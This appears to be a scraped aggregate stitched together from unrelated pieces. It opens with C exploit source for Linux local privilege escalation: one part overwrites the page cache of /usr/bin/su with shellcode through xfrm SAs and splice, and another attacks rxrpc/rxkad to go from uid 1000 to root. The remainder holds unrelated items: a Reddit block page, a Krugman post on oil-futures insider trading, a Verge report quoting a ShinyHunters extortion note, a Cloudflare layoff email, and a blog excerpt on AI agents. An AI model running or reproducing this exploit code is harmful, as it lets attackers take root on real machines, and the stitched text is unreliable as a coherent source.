uin­t8_t hdr[24]; *(uint32_t*)(hdr + 0) = htonl(spi); *(uint32_t*)(hdr + 4) = htonl(SE­Q_­VAL); mem­set(hdr + 8, 0xCC, 16);

struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) }; if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) { close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); re­turn -1; } of­f_t off = off­set; ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE); if (s != 16) { close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); re­turn -1; } s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE); /* still pro­ceed re­gard­less of splice rc — ker­nel may have al­ready * de­crypted the page in the time be­tween splice and recv */ usleep(150 * 1000);

close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); re­turn s == 40 ? 0 : -1; }

sta­tic int ver­i­fy_byte(const char *path, of­f_t off­set, uin­t8_t want) { int fd = open(path, O_RDONLY); if (fd < 0) re­turn -1; uin­t8_t got; if (pread(fd, &got, 1, off­set) != 1) { close(fd); re­turn -1; } close(fd); re­turn got == want ? 0 : -1; }

sta­tic int cor­rup­t_su(void) { set­up_usern­s_netns(); usleep(100 * 1000);

/* Install 40 xfrm SAs, one per 4-byte chunk. Each car­ries the * de­sired pay­load word in its se­q_hi field. */ for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uin­t32_t spi = 0xDEADBE10 + i; uin­t32_t se­qhi = ((uint32_t)shell_elf[i*4 + 0] << 24) | ((uint32_t)shell_elf[i*4 + 1] << 16) | ((uint32_t)shell_elf[i*4 + 2] << 8) | ((uint32_t)shell_elf[i*4 + 3]); if (add_xfrm_sa(spi, se­qhi) < 0) { SLOG(“add_xfrm_sa #%d failed”, i); re­turn -1; } } SLOG(“installed %d xfrm SAs”, PAYLOAD_LEN / 4);

for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uin­t32_t spi = 0xDEADBE10 + i; of­f_t off = PATCH_OFFSET + i * 4; if (do_one_write(TARGET_PATH, off, spi) < 0) { SLOG(“do_one_write #%d at off=0x%lx failed”, i, (long)off); re­turn -1; } } SLOG(“wrote %d bytes to %s start­ing at 0x%x”, PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET); re­turn 0; }

int su_lpe_­main(int argc, char **argv) { for (int i = 1; i < argc; i++) { if (!strcmp(argv[i], -v”) || !strcmp(argv[i], –verbose”)) g_­su_ver­bose = 1; else if (!strcmp(argv[i], –corrupt-only”)) ; /* com­pat: this body al­ways cor­rupts only */ } if (getenv(“DIRTYFRAG_VERBOSE”)) g_­su_ver­bose = 1;

pid_t cpid = fork(); if (cpid < 0) re­turn 1; if (cpid == 0) { int rc = cor­rup­t_su(); _exit(rc == 0 ? 0 : 2); } int csta­tus; wait­pid(cpid, &cstatus, 0); if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) { SLOG(“corruption stage failed (status=0x%x)”, csta­tus); re­turn 1; }

/* Sanity check: bytes at the em­bed­ded ELF en­try (file off­set 0x78 * af­ter our over­write) should be 0x31 0xff (xor edi, edi — first * in­struc­tion of the new shell­code). */ if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 || ver­i­fy_byte(TAR­GET_­PATH, ENTRY_OFFSET + 1, 0xff) != 0) { SLOG(“post-write ver­ify failed (target un­changed)“); re­turn 1; } SLOG(“/usr/bin/su page-cache patched (entry 0x%x = shell­code)”, ENTRY_OFFSET); re­turn 0; } /* * rxrpc/​rxkad LPE — uid=1000 → root */

#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <stdarg.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <time.h> #include <sched.h> #include <poll.h> #include <signal.h> #include <sys/wait.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/uio.h> #include <sys/types.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/rxrpc.h> #include <linux/keyctl.h> #include <linux/if_alg.h> #include <net/if.h> #include <termios.h>

#ifndef AF_RXRPC #define AF_RXRPC 33 #endif #ifndef PF_RXRPC #define PF_RXRPC AF_RXRPC #endif #ifndef SOL_RXRPC #define SOL_RXRPC 272 #endif #ifndef SOL_ALG #define SOL_ALG 279 #endif #ifndef AF_ALG #define AF_ALG 38 #endif #ifndef MSG_SPLICE_PAGES #define MSG_SPLICE_PAGES 0x8000000 #endif

/* –– rxrpc con­stants –– */ #define RXRPC_PACKET_TYPE_DATA 1 #define RXRPC_PACKET_TYPE_ACK 2 #define RXRPC_PACKET_TYPE_ABORT 4 #define RXRPC_PACKET_TYPE_CHALLENGE 6 #define RXRPC_PACKET_TYPE_RESPONSE 7 #define RXRPC_CLIENT_INITIATED 0x01 #define RXRPC_REQUEST_ACK 0x02 #define RXRPC_LAST_PACKET 0x04 #define RXRPC_CHANNELMASK 3 #define RXRPC_CIDSHIFT 2

struct rxr­pc_wire_­header { uin­t32_t epoch; uin­t32_t cid; uin­t32_t call­Num­ber; uin­t32_t seq; uin­t32_t se­r­ial; uin­t8_t type; uin­t8_t flags; uin­t8_t user­Sta­tus; uin­t8_t se­cu­ri­tyIn­dex; uin­t16_t ck­sum; /* big-en­dian on wire */ uin­t16_t ser­vi­ceId; } __attribute__((packed));

struct rxkad_chal­lenge { uin­t32_t ver­sion; uin­t32_t nonce; uin­t32_t min_level; uin­t32_t __padding; } __attribute__((packed));

/* Attacker-chosen 8-byte ses­sion key used for the rxkad to­ken. * Mutable be­cause the LPE brute-force it­er­ates over keys look­ing for * one that de­crypts the file’s UID field to a 0:” pre­fix. */ sta­tic uin­t8_t SESSION_KEY[8] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08 };

#define LOG(fmt, …) fprintf(stderr, [+] fmt \n”, ##__VA_ARGS__) #define WARN(fmt, …) fprintf(stderr, [!] fmt \n”, ##__VA_ARGS__) #define DBG(fmt, …) fprintf(stderr, [.] fmt \n”, ##__VA_ARGS__)

/* =================================================================== */ /* un­share + map setup */ /* =================================================================== */

sta­tic int write_­file(const char *path, const char *fmt, …) { int fd = open(path, O_WRONLY); if (fd < 0) re­turn -1; char buf[256]; va_list ap; va_s­tart(ap, fmt); int n = vs­nprintf(buf, sizeof(buf), fmt, ap); va_end(ap); int r = (int)write(fd, buf, n); close(fd); re­turn r; }

sta­tic int do_un­share_usern­s_netns(void) { uid_t re­al_uid = ge­tuid(); gid_t re­al_gid = get­gid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { WARN(“unshare(NEWUSER|NEWNET): %s”, str­error(er­rno)); re­turn -1; } LOG(“unshare(USER|NET) OK, real uid=%u”, re­al_uid); write_­file(“/​proc/​self/​set­groups”, deny”); if (write_file(“/proc/self/uid_map”, %u %u 1″, re­al_uid, re­al_uid) < 0) { WARN(“uid_map: %s”, str­error(er­rno)); re­turn -1; } if (write_file(“/proc/self/gid_map”, %u %u 1”, re­al_gid, re­al_gid) < 0) { WARN(“gid_map: %s”, str­error(er­rno)); re­turn -1; } LOG(“uid/gid iden­tity-mapped %u/%u; gained CAP_NET_RAW within netns”, re­al_uid, re­al_gid);

/* ifup lo */ int s = socket(AF_INET, SOCK_DGRAM, 0); if (s >= 0) { struct ifreq ifr; mem­set(&ifr, 0, sizeof(ifr)); str­cpy(ifr.ifr_­name, lo”); if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { ifr.ifr_flags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) WARN(“SIOCSIFFLAGS lo: %s”, str­error(er­rno)); else LOG(“lo brought UP in new netns”); } close(s); } re­turn 0; }

/* =================================================================== */ /* rxrpc key (rxkad v1 to­ken with at­tacker ses­sion key) */ /* =================================================================== */

sta­tic long key_add(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { re­turn syscall(SYS_ad­d_key, type, desc, pay­load, plen, ringid); }

sta­tic int build_rxr­pc_v1_­to­ken(uin­t8_t *out, size_t maxlen) { uin­t8_t *p = out; uin­t32_t now = (uint32_t)time(NULL); uin­t32_t ex­pires = now + 86400; *(uint32_t *)p = htonl(0); p += 4; /* flags */ const char *cell = evil”; uin­t32_t clen = strlen(cell); *(uint32_t *)p = htonl(clen); p += 4; mem­cpy(p, cell, clen); uin­t32_t pad = (4 - (clen & 3)) & 3; mem­set(p + clen, 0, pad); p += clen + pad; *(uint32_t *)p = htonl(1); p += 4; /* nto­ken */ uin­t8_t *toklen_p = p; p += 4; uin­t8_t *tokstart = p; *(uint32_t *)p = htonl(2); p += 4; /* sec_ix = RXKAD */ *(uint32_t *)p = htonl(0); p += 4; /* vice_id */ *(uint32_t *)p = htonl(1); p += 4; /* kvno */ mem­cpy(p, SESSION_KEY, 8); p += 8; /* ses­sion_key K */ *(uint32_t *)p = htonl(now); p += 4; *(uint32_t *)p = htonl(ex­pires); p += 4; *(uint32_t *)p = htonl(1); p += 4; /* pri­ma­ry_flag */ *(uint32_t *)p = htonl(8); p += 4; /* tick­et_len */ mem­set(p, 0xCC, 8); p += 8; /* ticket */ uin­t32_t toklen = (uint32_t)(p - tok­start); *(uint32_t *)toklen_p = htonl(toklen); if ((size_t)(p - out) > maxlen) { er­rno = E2BIG; re­turn -1; } re­turn (int)(p - out); }

sta­tic long ad­d_rxr­pc_key(const char *desc) { uin­t8_t buf[512]; int n = build_rxr­pc_v1_­to­ken(buf, sizeof(buf)); if (n < 0) re­turn -1; re­turn key_add(“rxrpc”, desc, buf, n, KEY_SPEC_PROCESS_KEYRING); }

/* =================================================================== */ /* AF_ALG pcbc(fcrypt) helpers */ /* =================================================================== */

sta­tic int al­g_open_pcbc_fcrypt(const uin­t8_t key[8]) { int s = socket(AF_ALG, SOCK_SEQPACKET, 0); if (s < 0) { WARN(“socket(AF_ALG): %s”, str­error(er­rno)); re­turn -1; } struct sock­ad­dr_alg sa = { .salg_family = AF_ALG }; str­cpy((char *)sa.salg_type, skcipher”); str­cpy((char *)sa.salg_name, pcbc(fcrypt)“); if (bind(s, (struct sock­addr *)&sa, sizeof(sa)) < 0) { WARN(“bind(AF_ALG pcbc(fcrypt)): %s”, str­error(er­rno)); close(s); re­turn -1; } if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) { WARN(“ALG_SET_KEY: %s”, str­error(er­rno)); close(s); re­turn -1; } re­turn s; }

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */ sta­tic int al­g_op(int al­g_s, int op, const uin­t8_t iv[8], const void *in, size_t inlen, void *out) { int op_fd = ac­cept(al­g_s, NULL, NULL); if (op_fd < 0) { WARN(“accept(AF_ALG): %s”, str­error(er­rno)); re­turn -1; }

char cbuf[CMS­G_­SPACE(sizeof(int)) + CMSG_SPACE(sizeof(struct af_al­g_iv) + 8)] = {0}; struct ms­ghdr msg = {0}; msg.ms­g_­con­trol = cbuf; msg.ms­g_­con­trollen = sizeof(cbuf);

struct cms­ghdr *c = CMSG_FIRSTHDR(&msg); c->cms­g_level = SOL_ALG; c->cms­g_­type = ALG_SET_OP; c->cms­g_len = CMSG_LEN(sizeof(int)); *(int *)CMSG_DATA(c) = op;

c = CMSG_NXTHDR(&msg, c); c->cms­g_level = SOL_ALG; c->cms­g_­type = ALG_SET_IV; c->cms­g_len = CMSG_LEN(sizeof(struct af_al­g_iv) + 8); struct af_al­g_iv *aiv = (struct af_al­g_iv *)CMSG_DATA(c); aiv->ivlen = 8; mem­cpy(aiv->iv, iv, 8);

struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen }; msg.ms­g_iov = &iov; msg.ms­g_iovlen = 1;

Blocked

old.reddit.com

Your re­quest has been blocked due to a net­work pol­icy.

Try log­ging in or cre­at­ing an ac­count here to get back to brows­ing.

If you’re run­ning a script or ap­pli­ca­tion, please reg­is­ter or sign in with your de­vel­oper cre­den­tials here. Additionally make sure your User-Agent is not empty and is some­thing unique and de­scrip­tive and try again. if you’re sup­ply­ing an al­ter­nate User-Agent string, try chang­ing back to de­fault as that can some­times re­sult in a block.

You can read Reddit’s Terms of Service here.

If you think that we’ve in­cor­rectly blocked you or you would like to dis­cuss eas­ier ways to get the data you want, please file a ticket here.

When con­tact­ing us, please in­clude your Reddit ac­count along with the fol­low­ing code:

Grand Theft Oil Futures

paulkrugman.substack.com

Source: CNBC, Financial Times, BBC, Reuters

At this point it’s al­most rou­tine: Almost every time Donald Trump makes a ma­jor an­nounce­ment about the Iran War, that an­nounce­ment is pre­ceded — some­times by only a few min­utes — by huge and hugely prof­itable bets in the oil mar­ket.

The in­flu­en­tial Kobeissi Letter doc­u­ments the lat­est ex­am­ple:

BREAKING: According to our analy­sis, ~$920 mil­lion worth of crude oil shorts were taken 70 min­utes be­fore an Axios re­port claimed the US and Iran were near a 14-point” deal to end the war.At 3:40 AM ET to­day, nearly 10,000 con­tracts worth of crude oil shorts were taken with­out any ma­jor news.This is equiv­a­lent to ~$920 mil­lion in no­tional value, an un­usu­ally large trade for 3:40 AM ET.At 4:50 AM ET, just 70 min­utes later, Axios re­ported that the US is close” to a memorandum of un­der­stand­ing” to end the Iran War.By 7:00 AM ET, oil prices had fallen over -12% with these crude oil shorts gain­ing ap­prox­i­mately +$125 mil­lion.Min­utes later, Iran launched the Persian Gulf Strait Authority” and oil prices surged +8%.What just hap­pened?

BREAKING: According to our analy­sis, ~$920 mil­lion worth of crude oil shorts were taken 70 min­utes be­fore an Axios re­port claimed the US and Iran were near a 14-point” deal to end the war.

At 3:40 AM ET to­day, nearly 10,000 con­tracts worth of crude oil shorts were taken with­out any ma­jor news.

This is equiv­a­lent to ~$920 mil­lion in no­tional value, an un­usu­ally large trade for 3:40 AM ET.

At 4:50 AM ET, just 70 min­utes later, Axios re­ported that the US is close” to a memorandum of un­der­stand­ing” to end the Iran War.

By 7:00 AM ET, oil prices had fallen over -12% with these crude oil shorts gain­ing ap­prox­i­mately +$125 mil­lion.

Minutes later, Iran launched the Persian Gulf Strait Authority” and oil prices surged +8%.

What just hap­pened?

As the BBC among oth­ers has doc­u­mented, this is­n’t the first time, or the sec­ond time, that this has hap­pened. Again and again, just be­fore Trump makes an­nounce­ments that raise hopes about the re­open­ing of the Strait of Hormuz, one or more whales,” very large traders, sell large quan­ti­ties of oil fu­tures, al­most in­stantly reap­ing big prof­its as prices fall.

What’s truly re­mark­able is that this keeps hap­pen­ing even though the pat­tern has be­come fa­mil­iar. This tells us two things: The Trump ad­min­is­tra­tion is mak­ing no real ef­fort to crack down on who­ever is trad­ing us­ing in­side in­for­ma­tion, and these in­side traders are op­er­at­ing with a com­plete sense of im­punity, as­sured that they can get away with it.

The stench of cor­rup­tion is over­whelm­ing. Yet aside from the raw cor­rup­tion, these in­ci­dents also raise a larger ques­tion. The in­sid­ers ripped off the par­ties who sold fu­tures to them at what turned out to be very un­fa­vor­able prices to the sell­ers. What broader dam­age does this kind of unchecked in­sider trad­ing do?

There’s both a nar­row and a broad an­swer.

The nar­row an­swer in­volves eco­nomic ef­fi­ciency. How is the func­tion­ing of the econ­omy af­fected by the re­al­iza­tion that some­body — it’s not hard to make guesses, but we don’t know for sure — is trad­ing oil fu­tures based on ad­vance knowl­edge about what will soon ap­pear on Truth Social or Fox News?

It took me a while to fig­ure this out. But I think I have an an­swer.

First, ask your­self what pur­pose is served by the oil fu­tures mar­ket. Unlike the pre­dic­tion mar­kets Polymarket and Kalshi, the oil fu­tures mar­ket is not in­tended to be mainly a ve­hi­cle for gam­bling. Instead, it is a mar­ket that serves to re­duce risk through hedg­ing.

Here’s how it works. There are peo­ple and in­sti­tu­tions, such as oil pro­duc­ers, who will need to sell oil at a fu­ture date. They want to lock in the price to­day on those fu­ture sales. There are also peo­ple and in­sti­tu­tions, such as air­lines, who have a fu­ture need for oil and would like to lock in the price to­day. Thus the fu­tures mar­ket lets both sell­ers and buy­ers of oil elim­i­nate a ma­jor source of risk — fluc­tu­a­tions in the price of oil. This re­duces un­cer­tainty in the econ­omy as a whole.

But what if there are sub­stan­tial play­ers in the fu­tures mar­ket with in­side in­for­ma­tion? Then if you are, say, a cor­po­ra­tion try­ing to lock in the price of oil you plan to buy next month, you may not be mak­ing a mu­tu­ally ben­e­fi­cial deal with fu­ture sell­ers. You may, in­stead, be be­ing played for a sucker — pay­ing what in ret­ro­spect will have been an ex­ces­sive price — by peo­ple who know what’s about to ap­pear in the pres­i­den­t’s so­cial me­dia feed.

The same could ap­ply to sell­ers of oil fu­tures, al­though the ex­am­ples of in­sider trad­ing we know about in­volved Trump in­sid­ers get­ting ahead of falling, not ris­ing, prices.

Either way, the ef­fect of traders’ sus­pi­cion that they may be losers in a rigged game will be to make them re­luc­tant to play at all — re­luc­tant ei­ther to buy or to sell oil fu­tures. And this will mean los­ing the risk-re­duc­ing ben­e­fits of a prop­erly func­tion­ing fu­tures mar­ket.

Now, in­sider trad­ing of oil fu­tures prob­a­bly is­n’t big enough to do crit­i­cal dam­age to those mar­kets. But it does do dam­age, which hurts all of us, not just the buy­ers who got stuck with the im­me­di­ate losses.

And be­yond the nar­row eco­nomic losses, in­sider trad­ing on oil is part of the broader rise of what we can call the pre­da­tion econ­omy.

Under Trump II, cor­rup­tion runs ram­pant. Success in busi­ness de­pends not on what you know but on who you know, and there are no rules be­yond hav­ing — and, ob­vi­ously, buy­ing — the right con­nec­tions.

This is bad for every­one who does­n’t have those con­nec­tions. It’s bad for eco­nomic growth. And it un­der­mines the moral ba­sis of the econ­omy and so­ci­ety as a whole. It’s the path of how a coun­try slides into third-world sta­tus.

I’ll have much more to say about the pre­da­tion econ­omy in fu­ture posts.

MUSICAL CODA

No posts

Canvas is down as ShinyHunters threatens to leak schools’ data

www.theverge.com

Emma Roth

is a news writer who cov­ers the stream­ing wars, con­sumer tech, crypto, so­cial me­dia, and much more. Previously, she was a writer and ed­i­tor at MUO.

The Instructure-owned learn­ing man­age­ment plat­form, Canvas, is down af­ter re­cently con­firm­ing a mas­sive data breach that im­pacted stu­dent names, email ad­dresses, ID num­bers, and mes­sages. Students at­tempt­ing to ac­cess the sys­tem on Thursday saw a mes­sage from the hack­ing group ShinyHunters, which claimed re­spon­si­bil­ity for the at­tack:

ShinyHunters has breached Instructure (again). Instead of con­tact­ing us to re­solve it they ig­nored us and did some security patches.” If any of the schools in the af­fected list are in­ter­ested in pre­vent­ing the re­lease of their data, please con­sult with a cy­ber ad­vi­sory firm and con­tact us pri­vately at TOX to ne­go­ti­ate a set­tle­ment. You have till the end of the day by 12 May 2026 be­fore every­thing is leaked.

ShinyHunters has breached Instructure (again). Instead of con­tact­ing us to re­solve it they ig­nored us and did some security patches.” If any of the schools in the af­fected list are in­ter­ested in pre­vent­ing the re­lease of their data, please con­sult with a cy­ber ad­vi­sory firm and con­tact us pri­vately at TOX to ne­go­ti­ate a set­tle­ment. You have till the end of the day by 12 May 2026 be­fore every­thing is leaked.

The mes­sage in­cluded a link to a list of schools ShinyHunter claims to have breached through Canvas.

Instructure has placed Canvas, Canvas Beta and Canvas Test in main­te­nance mode,” ac­cord­ing to Infrastructure’s sta­tus page. We an­tic­i­pate be­ing up soon, and will pro­vide up­dates as soon as pos­si­ble.”

Instructure said last week that it deployed patches to en­hance sys­tem se­cu­rity” fol­low­ing the breach. ShinyHunters — which has claimed re­spon­si­bil­ity for at­tacks on Ticketmaster, AT&T, Rockstar Games, ADT, and Vercel — said its data leak site con­tains 9,000 schools, in­clud­ing data be­long­ing to 275 mil­lion stu­dents, teach­ers, and other staff, ac­cord­ing to Bleeping Computer.

Update, May 7th: Added Infrastructure’s main­te­nance mode mes­sage.

Follow top­ics and au­thors from this story to see more like this in your per­son­al­ized home­page feed and to re­ceive email up­dates.

Emma Roth

Building For The Future

blog.cloudflare.com

2026 – 05-07

3 min read

This af­ter­noon, we sent the fol­low­ing email to our global team. One of our core val­ues at Cloudflare is trans­parency, and we be­lieve it’s im­por­tant that you hear this di­rectly from us be­cause it’s a ma­jor mo­ment at Cloudflare.

Team:We are writ­ing to let you know di­rectly that we’ve made the de­ci­sion to re­duce Cloudflare’s work­force by more than 1,100 em­ploy­ees glob­ally.  The way we work at Cloudflare has fun­da­men­tally changed. We don’t just build and sell AI tools and plat­forms. We are our own most de­mand­ing cus­tomer. Cloudflare’s us­age of AI has in­creased by more than 600% in the last three months alone. Employees across the com­pany from en­gi­neer­ing to HR to fi­nance to mar­ket­ing run thou­sands of AI agent ses­sions each day to get their work done. That means we have to be in­ten­tional in how we ar­chi­tect our com­pany for the agen­tic AI era in or­der to su­per­charge the value we de­liver to our cus­tomers and to honor our mis­sion to help build a bet­ter Internet for every­one, every­where. To­day is a hard day. This de­ci­sion un­for­tu­nately means say­ing good­bye to team­mates who have con­tributed mean­ing­fully to our mis­sion and to build­ing Cloudflare into one of the world’s most suc­cess­ful com­pa­nies. We want to be clear that this de­ci­sion is not a re­flec­tion of the in­di­vid­ual work or tal­ent of those leav­ing us. Instead, we are reimag­in­ing every in­ter­nal process, team, and role across the com­pany. Today’s ac­tions are not a cost-cut­ting ex­er­cise or an as­sess­ment of in­di­vid­u­als’ per­for­mance; they are about Cloudflare defin­ing how a world-class, high-growth com­pany op­er­ates and cre­ates value in the agen­tic AI era.  This is a mo­ment we need to own as founders and lead­ers of the com­pany. Matthew has per­son­ally sent out every of­fer let­ter we’ve ex­tended. It is a prac­tice he has al­ways looked for­ward to be­cause it rep­re­sented our growth and the in­cred­i­ble tal­ent join­ing our mis­sion. It did­n’t feel right for this mes­sage to come from any­one other than the two of us. Rather than trick­ling out no­tices through man­agers, we will be send­ing emails to every em­ployee. Within the next hour, every mem­ber of our global team will re­ceive an email from both of us clar­i­fy­ing how this change af­fects them. For those de­part­ing to­day, we will send this up­date to both their per­sonal and Cloudflare ad­dresses to en­sure they re­ceive the in­for­ma­tion im­me­di­ately.It’s im­por­tant to us that we treat de­part­ing team mem­bers right and in a way that ex­ceeds what we’ve seen from other com­pa­nies. We be­lieve act­ing with em­pa­thy is­n’t about avoid­ing hard de­ci­sions but rather about how you treat peo­ple when those de­ci­sions are made. If we are ask­ing our team to be world-class, we have a rec­i­p­ro­cal oblig­a­tion to be world-class in how we treat them. We are pair­ing the di­rect­ness of these mea­sures with sev­er­ance pack­ages that lead the in­dus­try. The pack­ages for de­part­ing em­ploy­ees will in­clude the equiv­a­lent of their full base pay through the end of 2026. Healthcare cov­er­age is dif­fer­ent across the globe, and if you’re in the United States, we’ll con­tinue to pro­vide sup­port through the end of the year. We are also vest­ing eq­uity for de­part­ing team mem­bers through August 15th, so they re­ceive stock be­yond their de­par­ture date. And, if de­part­ing team mem­bers haven’t hit their one-year cliffs, we are go­ing to waive those and vest their pro-rated eq­uity through August as well. We’ve asked the team to do this only once, as hard as that may be to­day. We don’t want to do it again for the fore­see­able fu­ture. By tak­ing de­ci­sive ac­tion now, we pro­vide im­me­di­ate clar­ity to those de­part­ing and pro­tect the sta­bil­ity of the team that re­mains. We are mak­ing these changes now be­cause mak­ing smaller, re­peated cuts or drag­ging a re­or­ga­ni­za­tion out over mul­ti­ple quar­ters cre­ates pro­longed emo­tional un­cer­tainty for em­ploy­ees and stalls our abil­ity to build. It’s the right thing to do; it’s the hon­est thing to do; and it re­flects the val­ues of the com­pany we are con­tin­u­ing to build.Cloud­flare started as a dig­i­tally na­tive com­pany built in the cloud. That al­lowed us to catch up to and pass com­pa­nies that had a head start of years or decades but were slowed down by out­dated sys­tems and processes. As we’ve now be­come the leader, we can­not rest on the work­flows and or­ga­ni­za­tional struc­tures that worked yes­ter­day. We’re con­fi­dent that our re­shaped or­ga­ni­za­tion will be even faster and more in­no­v­a­tive as we con­tinue build­ing the fu­ture.To those de­part­ing us: you’ve helped build the strong foun­da­tion Cloudflare stands on to­day. We have the ut­most re­spect for your work and grat­i­tude for the im­pact you have made. We’re con­fi­dent you will land at other great places and build many fu­ture great com­pa­nies, bring­ing with you a unique set of skills learned while build­ing Cloudflare.Transparency is a core prin­ci­ple at Cloudflare, and it was im­por­tant that you hear this from us first. We will be head­ing to our earn­ings con­fer­ence call at 2 PM PT, when we’ll share more. We also plan to ad­dress to­day’s an­nounce­ments live with the team at our all-hands meet­ing. It’s not an easy day, but it’s the right de­ci­sion. Our mis­sion to help build a bet­ter Internet is more im­por­tant now than ever, and there’s a lot of work left to be done.

Team:

We are writ­ing to let you know di­rectly that we’ve made the de­ci­sion to re­duce Cloudflare’s work­force by more than 1,100 em­ploy­ees glob­ally.

The way we work at Cloudflare has fun­da­men­tally changed. We don’t just build and sell AI tools and plat­forms. We are our own most de­mand­ing cus­tomer. Cloudflare’s us­age of AI has in­creased by more than 600% in the last three months alone. Employees across the com­pany from en­gi­neer­ing to HR to fi­nance to mar­ket­ing run thou­sands of AI agent ses­sions each day to get their work done. That means we have to be in­ten­tional in how we ar­chi­tect our com­pany for the agen­tic AI era in or­der to su­per­charge the value we de­liver to our cus­tomers and to honor our mis­sion to help build a bet­ter Internet for every­one, every­where.

Today is a hard day. This de­ci­sion un­for­tu­nately means say­ing good­bye to team­mates who have con­tributed mean­ing­fully to our mis­sion and to build­ing Cloudflare into one of the world’s most suc­cess­ful com­pa­nies. We want to be clear that this de­ci­sion is not a re­flec­tion of the in­di­vid­ual work or tal­ent of those leav­ing us. Instead, we are reimag­in­ing every in­ter­nal process, team, and role across the com­pany. Today’s ac­tions are not a cost-cut­ting ex­er­cise or an as­sess­ment of in­di­vid­u­als’ per­for­mance; they are about Cloudflare defin­ing how a world-class, high-growth com­pany op­er­ates and cre­ates value in the agen­tic AI era.

This is a mo­ment we need to own as founders and lead­ers of the com­pany. Matthew has per­son­ally sent out every of­fer let­ter we’ve ex­tended. It is a prac­tice he has al­ways looked for­ward to be­cause it rep­re­sented our growth and the in­cred­i­ble tal­ent join­ing our mis­sion. It did­n’t feel right for this mes­sage to come from any­one other than the two of us. Rather than trick­ling out no­tices through man­agers, we will be send­ing emails to every em­ployee.

Within the next hour, every mem­ber of our global team will re­ceive an email from both of us clar­i­fy­ing how this change af­fects them. For those de­part­ing to­day, we will send this up­date to both their per­sonal and Cloudflare ad­dresses to en­sure they re­ceive the in­for­ma­tion im­me­di­ately.

It’s im­por­tant to us that we treat de­part­ing team mem­bers right and in a way that ex­ceeds what we’ve seen from other com­pa­nies. We be­lieve act­ing with em­pa­thy is­n’t about avoid­ing hard de­ci­sions but rather about how you treat peo­ple when those de­ci­sions are made. If we are ask­ing our team to be world-class, we have a rec­i­p­ro­cal oblig­a­tion to be world-class in how we treat them. We are pair­ing the di­rect­ness of these mea­sures with sev­er­ance pack­ages that lead the in­dus­try. The pack­ages for de­part­ing em­ploy­ees will in­clude the equiv­a­lent of their full base pay through the end of 2026. Healthcare cov­er­age is dif­fer­ent across the globe, and if you’re in the United States, we’ll con­tinue to pro­vide sup­port through the end of the year. We are also vest­ing eq­uity for de­part­ing team mem­bers through August 15th, so they re­ceive stock be­yond their de­par­ture date. And, if de­part­ing team mem­bers haven’t hit their one-year cliffs, we are go­ing to waive those and vest their pro-rated eq­uity through August as well.

We’ve asked the team to do this only once, as hard as that may be to­day. We don’t want to do it again for the fore­see­able fu­ture. By tak­ing de­ci­sive ac­tion now, we pro­vide im­me­di­ate clar­ity to those de­part­ing and pro­tect the sta­bil­ity of the team that re­mains. We are mak­ing these changes now be­cause mak­ing smaller, re­peated cuts or drag­ging a re­or­ga­ni­za­tion out over mul­ti­ple quar­ters cre­ates pro­longed emo­tional un­cer­tainty for em­ploy­ees and stalls our abil­ity to build. It’s the right thing to do; it’s the hon­est thing to do; and it re­flects the val­ues of the com­pany we are con­tin­u­ing to build.

Cloudflare started as a dig­i­tally na­tive com­pany built in the cloud. That al­lowed us to catch up to and pass com­pa­nies that had a head start of years or decades but were slowed down by out­dated sys­tems and processes. As we’ve now be­come the leader, we can­not rest on the work­flows and or­ga­ni­za­tional struc­tures that worked yes­ter­day. We’re con­fi­dent that our re­shaped or­ga­ni­za­tion will be even faster and more in­no­v­a­tive as we con­tinue build­ing the fu­ture.

To those de­part­ing us: you’ve helped build the strong foun­da­tion Cloudflare stands on to­day. We have the ut­most re­spect for your work and grat­i­tude for the im­pact you have made. We’re con­fi­dent you will land at other great places and build many fu­ture great com­pa­nies, bring­ing with you a unique set of skills learned while build­ing Cloudflare.

Transparency is a core prin­ci­ple at Cloudflare, and it was im­por­tant that you hear this from us first. We will be head­ing to our earn­ings con­fer­ence call at 2 PM PT, when we’ll share more. We also plan to ad­dress to­day’s an­nounce­ments live with the team at our all-hands meet­ing.

It’s not an easy day, but it’s the right de­ci­sion. Our mis­sion to help build a bet­ter Internet is more im­por­tant now than ever, and there’s a lot of work left to be done.

reuters.com

www.reuters.com

Please en­able JS and dis­able any ad blocker

agents need control flow, not more prompts

bsuh.bearblog.dev

bri­an’s thoughts

Home Blog

07 May, 2026

Thesis: re­li­able agents tack­ling com­plex tasks need de­ter­min­is­tic con­trol flow en­coded in soft­ware, not in­creas­ingly elab­o­rate prompt chains

If you’ve ever re­sorted to MANDATORY or DO NOT SKIP, you’ve hit the ceil­ing of prompt­ing.

Imagine a pro­gram­ming lan­guage where state­ments are sug­ges­tions and func­tions re­turn Success” while hal­lu­ci­nat­ing. Reasoning be­comes im­pos­si­ble; re­li­a­bil­ity col­lapses as com­plex­ity grows.

